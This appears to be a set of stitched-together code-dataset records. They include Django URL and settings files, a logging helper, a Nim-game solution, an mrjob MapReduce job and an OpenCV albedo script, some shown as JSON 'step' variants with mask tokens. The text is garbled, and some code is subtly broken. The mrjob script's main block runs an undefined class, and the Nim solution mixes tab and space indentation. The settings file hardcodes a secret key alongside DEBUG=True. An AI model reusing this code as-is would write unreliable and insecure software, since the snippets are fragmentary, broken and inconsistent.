1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic import TemplateView
from django.conf.urls.static import static
from django.conf import settings
from .auth.views import account_profile
from .views import member_index, member_action
urlpatterns = [
# Landing page area
url(r'^$', TemplateView.as_view(template_name='visitor/landing-index.html'), name='landing_index'),
url(r'^about$', TemplateView.as_view(template_name='visitor/landing-about.html'), name='landing_about'),
url(r'^terms/$', TemplateView.as_view(template_name='visitor/terms.html'), name='website_terms'),
url(r'^contact$', TemplateView.as_view(template_name='visitor/contact.html'), name='website_contact'),
# Account management is done by allauth
url(r'^accounts/', include('allauth.urls')),
# Account profile and member info done locally
url(r'^accounts/profile/$', account_profile, name='account_profile'),
url(r'^member/$', member_index, name='user_home'),
url(r'^member/action$', member_action, name='user_action'),
# Usual Django admin
url(r'^admin/', admin.site.urls),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
flexible
|
{
"blob_id": "312a95c9514722157653365104d8cd0ada760ce8",
"index": 8084,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('^$', TemplateView.as_view(template_name=\n 'visitor/landing-index.html'), name='landing_index'), url('^about$',\n TemplateView.as_view(template_name='visitor/landing-about.html'), name=\n 'landing_about'), url('^terms/$', TemplateView.as_view(template_name=\n 'visitor/terms.html'), name='website_terms'), url('^contact$',\n TemplateView.as_view(template_name='visitor/contact.html'), name=\n 'website_contact'), url('^accounts/', include('allauth.urls')), url(\n '^accounts/profile/$', account_profile, name='account_profile'), url(\n '^member/$', member_index, name='user_home'), url('^member/action$',\n member_action, name='user_action'), url('^admin/', admin.site.urls)\n ] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n",
"step-3": "<mask token>\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.views.generic import TemplateView\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom .auth.views import account_profile\nfrom .views import member_index, member_action\nurlpatterns = [url('^$', TemplateView.as_view(template_name=\n 'visitor/landing-index.html'), name='landing_index'), url('^about$',\n TemplateView.as_view(template_name='visitor/landing-about.html'), name=\n 'landing_about'), url('^terms/$', TemplateView.as_view(template_name=\n 'visitor/terms.html'), name='website_terms'), url('^contact$',\n TemplateView.as_view(template_name='visitor/contact.html'), name=\n 'website_contact'), url('^accounts/', include('allauth.urls')), url(\n '^accounts/profile/$', account_profile, name='account_profile'), url(\n '^member/$', member_index, name='user_home'), url('^member/action$',\n member_action, name='user_action'), url('^admin/', admin.site.urls)\n ] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n",
"step-4": "\"\"\"URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.conf.urls import url, include\r\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.conf.urls import include, url\r\nfrom django.contrib import admin\r\nfrom django.views.generic import TemplateView\r\nfrom django.conf.urls.static import static\r\nfrom django.conf import settings\r\n\r\nfrom .auth.views import account_profile\r\nfrom .views import member_index, member_action\r\n\r\nurlpatterns = [\r\n # Landing page area\r\n url(r'^$', TemplateView.as_view(template_name='visitor/landing-index.html'), name='landing_index'),\r\n url(r'^about$', TemplateView.as_view(template_name='visitor/landing-about.html'), name='landing_about'),\r\n url(r'^terms/$', TemplateView.as_view(template_name='visitor/terms.html'), name='website_terms'),\r\n url(r'^contact$', TemplateView.as_view(template_name='visitor/contact.html'), name='website_contact'),\r\n\r\n # Account management is done by allauth\r\n url(r'^accounts/', include('allauth.urls')),\r\n\r\n # Account profile and member info done locally\r\n url(r'^accounts/profile/$', account_profile, name='account_profile'),\r\n url(r'^member/$', member_index, name='user_home'),\r\n url(r'^member/action$', member_action, name='user_action'),\r\n\r\n # Usual Django admin\r\n url(r'^admin/', admin.site.urls),\r\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import logging
loggers = {}
def create_logger(
        log_level: str = 'INFO',
        log_name: str = 'logfile',
        export_log: bool = True,
        save_dir: str = ''):
    if log_name in loggers:
logger = loggers.get(log_name)
else:
# create logger
logger = logging.getLogger(log_name)
logger.setLevel(logging.DEBUG)
# create console handler and set level to debug
handler1 = logging.StreamHandler()
handler1.setLevel(log_level)
# create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# add formatter to ch
handler1.setFormatter(formatter)
# add ch to logger
logger.addHandler(handler1)
if export_log:
pathname = log_name
if len(save_dir)>0:
pathname = f'{save_dir}/{pathname}'
handler2 = logging.FileHandler(filename=f'{pathname}.log', mode='w')
handler2.setLevel('DEBUG')
handler2.setFormatter(formatter)
logger.addHandler(handler2)
loggers[log_name] = logger
return logger
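# A minimal usage sketch (the logger name 'demo' is illustrative, not from the source):
if __name__ == '__main__':
    log = create_logger(log_level='INFO', log_name='demo')
    log.info('logger ready')  # goes to the console and to demo.log
    assert create_logger(log_name='demo') is log  # cached: repeat calls add no duplicate handlers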
|
normal
|
{
"blob_id": "3146775c466368c25c92bd6074abb97408533500",
"index": 2956,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_logger(log_level: str='INFO', log_name: str='logfile',\n export_log: bool=True, save_dir: str=''):\n if log_name in loggers.keys():\n logger = loggers.get(log_name)\n else:\n logger = logging.getLogger(log_name)\n logger.setLevel(logging.DEBUG)\n handler1 = logging.StreamHandler()\n handler1.setLevel(log_level)\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler1.setFormatter(formatter)\n logger.addHandler(handler1)\n if export_log:\n pathname = log_name\n if len(save_dir) > 0:\n pathname = f'{save_dir}/{pathname}'\n handler2 = logging.FileHandler(filename=f'{pathname}.log', mode='w'\n )\n handler2.setLevel('DEBUG')\n handler2.setFormatter(formatter)\n logger.addHandler(handler2)\n loggers[log_name] = logger\n return logger\n",
"step-3": "<mask token>\nloggers = {}\n\n\ndef create_logger(log_level: str='INFO', log_name: str='logfile',\n export_log: bool=True, save_dir: str=''):\n if log_name in loggers.keys():\n logger = loggers.get(log_name)\n else:\n logger = logging.getLogger(log_name)\n logger.setLevel(logging.DEBUG)\n handler1 = logging.StreamHandler()\n handler1.setLevel(log_level)\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler1.setFormatter(formatter)\n logger.addHandler(handler1)\n if export_log:\n pathname = log_name\n if len(save_dir) > 0:\n pathname = f'{save_dir}/{pathname}'\n handler2 = logging.FileHandler(filename=f'{pathname}.log', mode='w'\n )\n handler2.setLevel('DEBUG')\n handler2.setFormatter(formatter)\n logger.addHandler(handler2)\n loggers[log_name] = logger\n return logger\n",
"step-4": "import logging\nloggers = {}\n\n\ndef create_logger(log_level: str='INFO', log_name: str='logfile',\n export_log: bool=True, save_dir: str=''):\n if log_name in loggers.keys():\n logger = loggers.get(log_name)\n else:\n logger = logging.getLogger(log_name)\n logger.setLevel(logging.DEBUG)\n handler1 = logging.StreamHandler()\n handler1.setLevel(log_level)\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler1.setFormatter(formatter)\n logger.addHandler(handler1)\n if export_log:\n pathname = log_name\n if len(save_dir) > 0:\n pathname = f'{save_dir}/{pathname}'\n handler2 = logging.FileHandler(filename=f'{pathname}.log', mode='w'\n )\n handler2.setLevel('DEBUG')\n handler2.setFormatter(formatter)\n logger.addHandler(handler2)\n loggers[log_name] = logger\n return logger\n",
"step-5": "import logging\n\nloggers = {} \n\ndef create_logger(\n log_level:str ='INFO', \n log_name:str = 'logfile',\n export_log: bool = True,\n save_dir:str = ''):\n if log_name in loggers.keys():\n logger = loggers.get(log_name)\n else:\n # create logger\n logger = logging.getLogger(log_name)\n logger.setLevel(logging.DEBUG)\n\n # create console handler and set level to debug\n handler1 = logging.StreamHandler()\n handler1.setLevel(log_level)\n\n # create formatter\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n # add formatter to ch\n handler1.setFormatter(formatter)\n\n # add ch to logger\n logger.addHandler(handler1)\n\n if export_log:\n pathname = log_name\n if len(save_dir)>0:\n pathname = f'{save_dir}/{pathname}'\n\n handler2 = logging.FileHandler(filename=f'{pathname}.log', mode='w')\n handler2.setLevel('DEBUG')\n handler2.setFormatter(formatter)\n logger.addHandler(handler2)\n \n loggers[log_name] = logger\n \n return logger\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from app.routes import home
from .home import bp as home  # NOTE: rebinds `home`, shadowing the module imported above
from .dashboard import bp as dashboard
|
flexible
|
{
"blob_id": "358a4948ac1f60e0966328cebf401777042c3d0e",
"index": 5239,
"step-1": "<mask token>\n",
"step-2": "from app.routes import home\nfrom .home import bp as home\nfrom .dashboard import bp as dashboard\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
class Solution(object):
def canWinNim(self, n):
"""
:type n: int
:rtype: bool
"""
        # n is a losing position exactly when it is a multiple of 4: whatever
        # 1-3 stones you take, the opponent can restore a multiple of 4.
        if n % 4 != 0:
            return True
        return False
"""main():
sol = Solution();
sol.canWinNim(4);
"""
|
normal
|
{
"blob_id": "9a539fd3ce4e3ff75af82407150ab4b550b255c1",
"index": 3284,
"step-1": "class Solution(object):\n def canWinNim(self, n):\n \"\"\"\n :type n: int\n :rtype: bool\n \"\"\"\n\tif(n % 4 != 0):\n\t\treturn True;\n\treturn False;\n\"\"\"main():\n\tsol = Solution();\n\tsol.canWinNim(4);\n\"\"\"\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from plprofiler_tool import main
from plprofiler import plprofiler
|
normal
|
{
"blob_id": "6b616f5ee0a301b76ad3f7284b47f225a694d33c",
"index": 1281,
"step-1": "<mask token>\n",
"step-2": "from plprofiler_tool import main\nfrom plprofiler import plprofiler\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
#-*- coding:utf-8 -*-
"""
Django settings for hehotel project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(__file__)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '6@j!6%foulnrume$wc7i5cwc2ppf6hcxoa&xh_vtanfy_rc@yc'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True  # switch to False once development is finished
EXCEPTION_INGORE_AJAX = True  # return the HTML error page even for AJAX requests
TEMPLATE_DEBUG = True
TEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]
RESOURCE_ROOT_PATH = os.path.join(BASE_DIR, 'templates').replace('\\','/')
#STATIC_ROOT_PATH = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'templates\static').replace('\\','/')
STATIC_ROOT_PATH = os.path.join(BASE_DIR, 'static').replace('\\','/')
ALLOWED_HOSTS = []
# Application definition
SITE_ID = 1
AUTH_USER_MODEL = 'member.User'
INSTALLED_APPS = (
'apps.member',
'django.contrib.admin',
'libs.djex.autodocs',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'django.contrib.flatpages',
'hehotel',
'apps.room',
'apps.order',
'apps.article',
)
MIDDLEWARE_CLASSES = (
'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
#'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'urls'
WSGI_APPLICATION = 'wsgi.application'
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(os.path.join(BASE_DIR, 'data'), 'db.sqlite3'),
},
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'zh_CN'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/__static__/'
SHOW_SQL = True  # whether to echo SQL statements to the console
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'file': {
'level': 'INFO',
'class': 'logging.FileHandler',
#'formatter': 'simple',
'filename': os.path.join(os.path.dirname(__file__), 'logs/auto.log'),
'mode': 'a',
}
},
'loggers': {
'log':{
'handlers': ['file'],
#'filters': ['special'],
'level': 'INFO',
'propagate': True
}
}
}
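# Note: the FileHandler above assumes a logs/ directory already exists next to
# this settings module; startup fails with an IOError otherwise. A minimal
# safeguard (a sketch, not part of the original settings):
# import errno
# try:
#     os.makedirs(os.path.join(BASE_DIR, 'logs'))
# except OSError as e:
#     if e.errno != errno.EEXIST:
#         raise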
|
normal
|
{
"blob_id": "045ad27f46c2090ed39a49144c3aa17093b0d9c7",
"index": 7094,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nBASE_DIR = os.path.dirname(__file__)\nSECRET_KEY = '6@j!6%foulnrume$wc7i5cwc2ppf6hcxoa&xh_vtanfy_rc@yc'\nDEBUG = True\nEXCEPTION_INGORE_AJAX = True\nTEMPLATE_DEBUG = True\nTEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]\nRESOURCE_ROOT_PATH = os.path.join(BASE_DIR, 'templates').replace('\\\\', '/')\nSTATIC_ROOT_PATH = os.path.join(BASE_DIR, 'static').replace('\\\\', '/')\nALLOWED_HOSTS = []\nSITE_ID = 1\nAUTH_USER_MODEL = 'member.User'\nINSTALLED_APPS = ('apps.member', 'django.contrib.admin',\n 'libs.djex.autodocs', 'django.contrib.auth',\n 'django.contrib.contenttypes', 'django.contrib.sessions',\n 'django.contrib.messages', 'django.contrib.staticfiles',\n 'django.contrib.sites', 'django.contrib.flatpages', 'hehotel',\n 'apps.room', 'apps.order', 'apps.article')\nMIDDLEWARE_CLASSES = (\n 'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware')\nROOT_URLCONF = 'urls'\nWSGI_APPLICATION = 'wsgi.application'\nSESSION_EXPIRE_AT_BROWSER_CLOSE = False\nDATABASES = {'default': {'ENGINE': 'django.db.backends.sqlite3', 'NAME': os\n .path.join(os.path.join(BASE_DIR, 'data'), 'db.sqlite3')}}\nLANGUAGE_CODE = 'zh_CN'\nTIME_ZONE = 'Asia/Shanghai'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nSTATIC_URL = '/__static__/'\nSHOW_SQL = True\nLOGGING = {'version': 1, 'disable_existing_loggers': False, 'handlers': {\n 'file': {'level': 'INFO', 'class': 'logging.FileHandler', 'filename':\n os.path.join(os.path.dirname(__file__), 'logs/auto.log'), 'mode': 'a'}},\n 'loggers': {'log': {'handlers': ['file'], 'level': 'INFO', 'propagate':\n True}}}\n",
"step-3": "<mask token>\nimport os\nBASE_DIR = os.path.dirname(__file__)\nSECRET_KEY = '6@j!6%foulnrume$wc7i5cwc2ppf6hcxoa&xh_vtanfy_rc@yc'\nDEBUG = True\nEXCEPTION_INGORE_AJAX = True\nTEMPLATE_DEBUG = True\nTEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]\nRESOURCE_ROOT_PATH = os.path.join(BASE_DIR, 'templates').replace('\\\\', '/')\nSTATIC_ROOT_PATH = os.path.join(BASE_DIR, 'static').replace('\\\\', '/')\nALLOWED_HOSTS = []\nSITE_ID = 1\nAUTH_USER_MODEL = 'member.User'\nINSTALLED_APPS = ('apps.member', 'django.contrib.admin',\n 'libs.djex.autodocs', 'django.contrib.auth',\n 'django.contrib.contenttypes', 'django.contrib.sessions',\n 'django.contrib.messages', 'django.contrib.staticfiles',\n 'django.contrib.sites', 'django.contrib.flatpages', 'hehotel',\n 'apps.room', 'apps.order', 'apps.article')\nMIDDLEWARE_CLASSES = (\n 'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware')\nROOT_URLCONF = 'urls'\nWSGI_APPLICATION = 'wsgi.application'\nSESSION_EXPIRE_AT_BROWSER_CLOSE = False\nDATABASES = {'default': {'ENGINE': 'django.db.backends.sqlite3', 'NAME': os\n .path.join(os.path.join(BASE_DIR, 'data'), 'db.sqlite3')}}\nLANGUAGE_CODE = 'zh_CN'\nTIME_ZONE = 'Asia/Shanghai'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nSTATIC_URL = '/__static__/'\nSHOW_SQL = True\nLOGGING = {'version': 1, 'disable_existing_loggers': False, 'handlers': {\n 'file': {'level': 'INFO', 'class': 'logging.FileHandler', 'filename':\n os.path.join(os.path.dirname(__file__), 'logs/auto.log'), 'mode': 'a'}},\n 'loggers': {'log': {'handlers': ['file'], 'level': 'INFO', 'propagate':\n True}}}\n",
"step-4": "#-*- coding:utf-8 -*-\n\"\"\"\nDjango settings for hehotel project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(__file__)\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '6@j!6%foulnrume$wc7i5cwc2ppf6hcxoa&xh_vtanfy_rc@yc'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True #结束开发状态应该切为False\nEXCEPTION_INGORE_AJAX = True #异常信息即便是ajax请求也直接返回Html页面\n\nTEMPLATE_DEBUG = True\nTEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]\nRESOURCE_ROOT_PATH = os.path.join(BASE_DIR, 'templates').replace('\\\\','/')\n#STATIC_ROOT_PATH = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'templates\\static').replace('\\\\','/')\nSTATIC_ROOT_PATH = os.path.join(BASE_DIR, 'static').replace('\\\\','/')\n\nALLOWED_HOSTS = []\n\n# Application definition\nSITE_ID = 1\n\nAUTH_USER_MODEL = 'member.User'\n\nINSTALLED_APPS = (\n 'apps.member',\n 'django.contrib.admin',\n 'libs.djex.autodocs',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n 'django.contrib.flatpages',\n 'hehotel',\n 'apps.room',\n 'apps.order',\n 'apps.article',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n #'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'urls'\n\nWSGI_APPLICATION = 'wsgi.application'\nSESSION_EXPIRE_AT_BROWSER_CLOSE = False\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(os.path.join(BASE_DIR, 'data'), 'db.sqlite3'),\n },\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'zh_CN'\n\nTIME_ZONE = 'Asia/Shanghai'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_URL = '/__static__/'\n\nSHOW_SQL = True#是否在console窗口显示sql语句\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'file': {\n 'level': 'INFO',\n 'class': 'logging.FileHandler',\n #'formatter': 'simple',\n 'filename': os.path.join(os.path.dirname(__file__), 'logs/auto.log'),\n 'mode': 'a',\n }\n },\n 'loggers': {\n 'log':{\n 'handlers': ['file'],\n #'filters': ['special'],\n 'level': 'INFO',\n 'propagate': True\n } \n }\n}\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from mrjob.job import MRJob
from mrjob.step import MRStep
from collections import Counter
import csv
def read_csvLine(line):
    # Given a comma-delimited string, return its fields
for row in csv.reader([line]):
return row
class MRTopVisitorCount(MRJob):
# Mapper1: emit page_id, 1
def mapper_count(self, _, line):
fields = read_csvLine(line)
yield fields[1], (fields[4], 1)
# Reducer1: aggregate page_id
def reducer_count(self, page, counts):
count = Counter()
for visitor in counts:
count.update({visitor[0]:visitor[1]})
yield page, count
    # Mapper2: pick the most frequent visitor for each page
def mapper_sort(self, page, counts):
top = Counter(counts).most_common(1)
yield page, (top[0][0], top[0][1])
# Reducer2: identity
def reducer_sort(self, page, visitor_count):
for v in visitor_count:
yield page, v
# Multi-step pipeline definition
def steps(self):
return [
MRStep(mapper=self.mapper_count,
reducer=self.reducer_count),
MRStep(mapper=self.mapper_sort,
reducer=self.reducer_sort)]
if __name__ == '__main__':
    MRTopVisitorCount.run()
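# Typical local invocation (script and input file names are illustrative):
#   python mr_top_visitor.py weblog.csv
# Output pairs each page_id with its single most frequent (visitor, count).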
|
normal
|
{
"blob_id": "471ce1eeb3293a424de74e25f36b76699a97ec2b",
"index": 7039,
"step-1": "<mask token>\n\n\nclass MRTopVisitorCount(MRJob):\n <mask token>\n <mask token>\n\n def mapper_sort(self, page, counts):\n top = Counter(counts).most_common(1)\n yield page, (top[0][0], top[0][1])\n\n def reducer_sort(self, page, visitor_count):\n for v in visitor_count:\n yield page, v\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MRTopVisitorCount(MRJob):\n\n def mapper_count(self, _, line):\n fields = read_csvLine(line)\n yield fields[1], (fields[4], 1)\n\n def reducer_count(self, page, counts):\n count = Counter()\n for visitor in counts:\n count.update({visitor[0]: visitor[1]})\n yield page, count\n\n def mapper_sort(self, page, counts):\n top = Counter(counts).most_common(1)\n yield page, (top[0][0], top[0][1])\n\n def reducer_sort(self, page, visitor_count):\n for v in visitor_count:\n yield page, v\n\n def steps(self):\n return [MRStep(mapper=self.mapper_count, reducer=self.reducer_count\n ), MRStep(mapper=self.mapper_sort, reducer=self.reducer_sort)]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef read_csvLine(line):\n for row in csv.reader([line]):\n return row\n\n\nclass MRTopVisitorCount(MRJob):\n\n def mapper_count(self, _, line):\n fields = read_csvLine(line)\n yield fields[1], (fields[4], 1)\n\n def reducer_count(self, page, counts):\n count = Counter()\n for visitor in counts:\n count.update({visitor[0]: visitor[1]})\n yield page, count\n\n def mapper_sort(self, page, counts):\n top = Counter(counts).most_common(1)\n yield page, (top[0][0], top[0][1])\n\n def reducer_sort(self, page, visitor_count):\n for v in visitor_count:\n yield page, v\n\n def steps(self):\n return [MRStep(mapper=self.mapper_count, reducer=self.reducer_count\n ), MRStep(mapper=self.mapper_sort, reducer=self.reducer_sort)]\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef read_csvLine(line):\n for row in csv.reader([line]):\n return row\n\n\nclass MRTopVisitorCount(MRJob):\n\n def mapper_count(self, _, line):\n fields = read_csvLine(line)\n yield fields[1], (fields[4], 1)\n\n def reducer_count(self, page, counts):\n count = Counter()\n for visitor in counts:\n count.update({visitor[0]: visitor[1]})\n yield page, count\n\n def mapper_sort(self, page, counts):\n top = Counter(counts).most_common(1)\n yield page, (top[0][0], top[0][1])\n\n def reducer_sort(self, page, visitor_count):\n for v in visitor_count:\n yield page, v\n\n def steps(self):\n return [MRStep(mapper=self.mapper_count, reducer=self.reducer_count\n ), MRStep(mapper=self.mapper_sort, reducer=self.reducer_sort)]\n\n\nif __name__ == '__main__':\n MRPageFreqCount.run()\n",
"step-5": "from mrjob.job import MRJob\nfrom mrjob.step import MRStep\nfrom collections import Counter\nimport csv\n\ndef read_csvLine(line):\n # Given a comma delimited string, return fields\n for row in csv.reader([line]):\n return row\n\nclass MRTopVisitorCount(MRJob):\n \n # Mapper1: emit page_id, 1\n def mapper_count(self, _, line):\n fields = read_csvLine(line)\n yield fields[1], (fields[4], 1)\n\n # Reducer1: aggregate page_id\n def reducer_count(self, page, counts):\n count = Counter()\n for visitor in counts:\n count.update({visitor[0]:visitor[1]})\n yield page, count\n \n # Mapper2: invert page and counts to sort\n def mapper_sort(self, page, counts):\n top = Counter(counts).most_common(1)\n yield page, (top[0][0], top[0][1])\n \n # Reducer2: identity\n def reducer_sort(self, page, visitor_count):\n for v in visitor_count:\n yield page, v\n \n # Multi-step pipeline definition\n def steps(self):\n return [\n MRStep(mapper=self.mapper_count,\n reducer=self.reducer_count),\n MRStep(mapper=self.mapper_sort,\n reducer=self.reducer_sort)]\n \n \n \n\nif __name__ == '__main__':\n MRPageFreqCount.run()",
"step-ids": [
3,
6,
7,
8,
10
]
}
|
[
3,
6,
7,
8,
10
] |
import cv2
import matplotlib.pyplot as plt
import numpy as np
ball = plt.imread('ball.png')
albedo = plt.imread('ball_albedo.png')
shading = cv2.cvtColor(plt.imread('ball_shading.png'), cv2.COLOR_GRAY2RGB)
x,y,z = np.where(albedo != 0)
print('Albedo:', albedo[x[0],y[0]])
print("Albedo in RGB space:", albedo[x[0],y[0]]*255)
# conversion of shading to RGB mapped the values to [0,1], therefore (0,255,0) = (0,1,0)
albedo[np.where(albedo[:, :] != (0, 0, 0))[:-1]] = (0, 1., 0)
plt.subplot(1,2,1)
plt.imshow(ball)
plt.subplot(1,2,2)
plt.imshow(albedo * shading)
plt.show()
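# Why this works: under the intrinsic-image model, image = albedo * shading
# (elementwise), so replacing the albedo with pure green and re-multiplying by
# the original shading renders a green ball under the same lighting.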
|
normal
|
{
"blob_id": "cc6f70e328b774972e272e9600274dfd9fca93ee",
"index": 3073,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('Albedo:', albedo[x[0], y[0]])\nprint('Albedo in RGB space:', albedo[x[0], y[0]] * 255)\n<mask token>\nplt.subplot(1, 2, 1)\nplt.imshow(ball)\nplt.subplot(1, 2, 2)\nplt.imshow(albedo * shading)\nplt.show()\n",
"step-3": "<mask token>\nball = plt.imread('ball.png')\nalbedo = plt.imread('ball_albedo.png')\nshading = cv2.cvtColor(plt.imread('ball_shading.png'), cv2.COLOR_GRAY2RGB)\nx, y, z = np.where(albedo != 0)\nprint('Albedo:', albedo[x[0], y[0]])\nprint('Albedo in RGB space:', albedo[x[0], y[0]] * 255)\nalbedo[np.where(albedo[:, :] != (0, 0, 0))[:-1]] = 0, 1.0, 0\nplt.subplot(1, 2, 1)\nplt.imshow(ball)\nplt.subplot(1, 2, 2)\nplt.imshow(albedo * shading)\nplt.show()\n",
"step-4": "import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nball = plt.imread('ball.png')\nalbedo = plt.imread('ball_albedo.png')\nshading = cv2.cvtColor(plt.imread('ball_shading.png'), cv2.COLOR_GRAY2RGB)\nx, y, z = np.where(albedo != 0)\nprint('Albedo:', albedo[x[0], y[0]])\nprint('Albedo in RGB space:', albedo[x[0], y[0]] * 255)\nalbedo[np.where(albedo[:, :] != (0, 0, 0))[:-1]] = 0, 1.0, 0\nplt.subplot(1, 2, 1)\nplt.imshow(ball)\nplt.subplot(1, 2, 2)\nplt.imshow(albedo * shading)\nplt.show()\n",
